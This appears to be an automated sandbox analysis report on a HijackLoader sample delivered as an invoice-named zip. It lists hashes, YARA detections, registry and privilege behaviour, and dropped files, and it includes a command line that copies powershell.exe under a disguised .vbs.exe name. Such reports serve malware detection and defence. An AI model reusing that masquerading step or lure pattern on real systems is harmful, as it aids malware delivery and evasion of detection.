Analysis

Max time kernel: 96s
Max time network: 146s
Platform: windows11-21h2_x64
Resource: win11-20241007-en
Resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
Submitted: 09-10-2024 15:15
Static task: static1
Behavioral task: behavioral1
Sample: facturagm-27725407957355783426.zip
Resource: win11-20241007-en
General

Target: facturagm-27725407957355783426.zip
Size: 49.2MB
MD5: 79e9ed02ff9d617c1732776ff596f47a
SHA1: 9e3dd3c140198fc5ff080dec7d610f5bb04d2e4a
SHA256: 48fa854012e6abef23589909ec3293efc3df0ab2b5ef4406ccaf7ee0b68464c6
SHA512: 7b418b82b6f8b7fb165ee2ca3a014ce94bd229a10d11fc141be8dea47a728e04670cfa795757d0ea6bf127db13952c4e4b1bc4ec3f25f623a5f108734b76d241
SSDEEP: 1572864:4ltjOLVis6A90iwyhwLmWaBOZF+QLr45/rby0:4ltjORX9VnqaBOj96/Xy0
Malware Config
Signatures

Detects HijackLoader (aka IDAT Loader) (3 IoCs)
HijackLoader is a multistage loader first seen in 2023.
  resource | yara_rule
  behavioral1/files/0x001c00000002aade-40.dat | family_hijackloader
  behavioral1/files/0x001000000002abcf-372.dat | family_hijackloader
  behavioral1/files/0x001900000002abd6-386.dat | family_hijackloader

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4548 | 276 | cmd.exe | 82

Executes dropped EXE (1 IoC)
  pid | Process
  2840 | facturagm-27725407957355783426.vbs.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | facturagm-27725407957355783426.vbs.exe

Modifies registry class (1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | WScript.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid | Process
  2840 | facturagm-27725407957355783426.vbs.exe
  2840 | facturagm-27725407957355783426.vbs.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  description | pid | Process
  Token: SeRestorePrivilege | 416 | 7zG.exe
  Token: 35 | 416 | 7zG.exe
  Token: SeSecurityPrivilege | 416 | 7zG.exe
  Token: SeSecurityPrivilege | 416 | 7zG.exe
  Token: SeDebugPrivilege | 2840 | facturagm-27725407957355783426.vbs.exe

Suspicious use of FindShellTrayWindow (1 IoC)
  pid | Process
  416 | 7zG.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  description | pid | Process | procid_target
  PID 3172 wrote to memory of 2840 | 3172 | WScript.exe | 85
  PID 3172 wrote to memory of 2840 | 3172 | WScript.exe | 85
  PID 3172 wrote to memory of 2840 | 3172 | WScript.exe | 85
Processes

C:\Windows\Explorer.exe (PID 3796)
  Command line: C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426.zip

C:\Windows\System32\rundll32.exe (PID 4820)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe (PID 416)
  Command line: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\" -spe -an -ai#7zMap2430:140:7zEvent5807
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow

C:\Windows\System32\WScript.exe (PID 3172)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs"
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

  Child: C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe (PID 2840)
    Command line: "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe" -enc 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
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\cmd.exe (PID 4548)
  Command line: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe" /Y
  - Process spawned unexpected child process
Network
MITRE ATT&CK Enterprise v15
Downloads
Dropped files (per-file MD5/SHA1/SHA256/SHA512 hash dumps omitted):

(no path recorded)
  Filesize: 60B

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Managed\hgfs.dll
  Filesize: 89KB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\cardigan.mpeg
  Filesize: 878KB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\glib-2.0.dll
  Filesize: 1.0MB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\msvcr90.dll
  Filesize: 638KB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\sqlite.dll
  Filesize: 243KB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\toparch.svg
  Filesize: 1.2MB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\vcruntime140.dll
  Filesize: 106KB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Resources\msvcp90.dll
  Filesize: 557KB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Resources\vcruntime140_1.dll
  Filesize: 48KB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\level4.resS
  Filesize: 128KB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\mozglue.dll
  Filesize: 222KB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\app.asar.unpacked\chronicle.svg
  Filesize: 901KB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\app.asar.unpacked\msvcp140.dll
  Filesize: 564KB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\vmtools.dll
  Filesize: 617KB

(no path recorded)
  Filesize: 1.6MB

C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe
  Filesize: 411KB